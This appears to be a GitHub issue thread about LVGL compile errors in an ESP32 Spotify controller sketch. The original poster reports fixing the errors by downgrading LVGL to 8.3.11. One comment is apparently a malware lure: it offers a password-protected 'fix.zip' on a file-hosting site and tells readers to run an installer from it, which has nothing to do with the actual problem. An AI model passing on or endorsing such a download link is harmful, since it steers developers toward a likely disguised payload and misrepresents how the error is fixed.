### ISSUE TITLE
Compilation error: 'struct lv_color_t' has no member named 'full'

### ISSUE THREAD

**Issue by flucko** [espired/esp32-spotify-controller#2]
I am getting an error when compiling the code:
`  if (bg_color.full == lv_color_hex(C_WHITE).full) {
    lv_obj_set_style_text_color(label, lv_color_hex(C_SPOTIFY_BLACK), 0);
  }`

Error:

> C:\Users\User1\Documents\Arduino\Spotif\Spotif.ino: In function 'lv_obj_t* createButton(lv_obj_t*, const char*, lv_event_cb_t, int, int, lv_color_t)':
C:\Users\User1\Documents\Arduino\Spotif\Spotif.ino:97:16: error: 'struct lv_color_t' has no member named 'full'
   97 |   if (bg_color.full == lv_color_hex(C_WHITE).full) {
      |                ^~~~
C:\Users\User1\Documents\Arduino\Spotif\Spotif.ino:97:46: error: 'struct lv_color_t' has no member named 'full'
   97 |   if (bg_color.full == lv_color_hex(C_WHITE).full) {
      |                                              ^~~~
C:\Users\User1\Documents\Arduino\Spotif\Spotif.ino: In lambda function:
C:\Users\User1\Documents\Arduino\Spotif\Spotif.ino:288:44: error: invalid conversion from 'void*' to 'lv_obj_t*' {aka '_lv_obj_t*'} [-fpermissive]
  288 |         lv_obj_t *btn = lv_event_get_target(e);
      |                         ~~~~~~~~~~~~~~~~~~~^~~
      |                                            |
      |                                            void*
C:\Users\User1\Documents\Arduino\Spotif\Spotif.ino: In lambda function:
C:\Users\User1\Documents\Arduino\Spotif\Spotif.ino:368:44: error: invalid conversion from 'void*' to 'lv_obj_t*' {aka '_lv_obj_t*'} [-fpermissive]
  368 |         lv_obj_t *btn = lv_event_get_target(e);
      |                         ~~~~~~~~~~~~~~~~~~~^~~
      |                                            |
      |                                            void*
C:\Users\User1\Documents\Arduino\Spotif\Spotif.ino: In function 'void fetchTrackImage(void*)':
C:\Users\User1\Documents\Arduino\Spotif\Spotif.ino:568:25: error: 'struct lv_image_header_t' has no member named 'always_zero'
  568 |         img_dsc->header.always_zero = 0;
      |                         ^~~~~~~~~~~
C:\Users\User1\Documents\Arduino\Spotif\Spotif.ino:571:30: error: 'LV_IMG_CF_TRUE_COLOR' was not declared in this scope
  571 |         img_dsc->header.cf = LV_IMG_CF_TRUE_COLOR;
      |                              ^~~~~~~~~~~~~~~~~~~~
C:\Users\User1\Documents\Arduino\Spotif\Spotif.ino: In function 'void fetchPlaylistImage(void*)':
C:\Users\User1\Documents\Arduino\Spotif\Spotif.ino:607:25: error: 'struct lv_image_header_t' has no member named 'always_zero'
  607 |         img_dsc->header.always_zero = 0;
      |                         ^~~~~~~~~~~
C:\Users\User1\Documents\Arduino\Spotif\Spotif.ino:610:30: error: 'LV_IMG_CF_TRUE_COLOR' was not declared in this scope
  610 |         img_dsc->header.cf = LV_IMG_CF_TRUE_COLOR;
      |                              ^~~~~~~~~~~~~~~~~~~~
Multiple libraries were found for "SD.h"
  Used: C:\Users\User1\AppData\Local\Arduino15\packages\esp32\hardware\esp32\3.0.3\libraries\SD
  Not used: C:\Users\User1\AppData\Local\Arduino15\libraries\SD
exit status 1

Compilation error: 'struct lv_color_t' has no member named 'full'

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by flucko** [comment]
Fixed by downgrading lvgl to 8.3.11
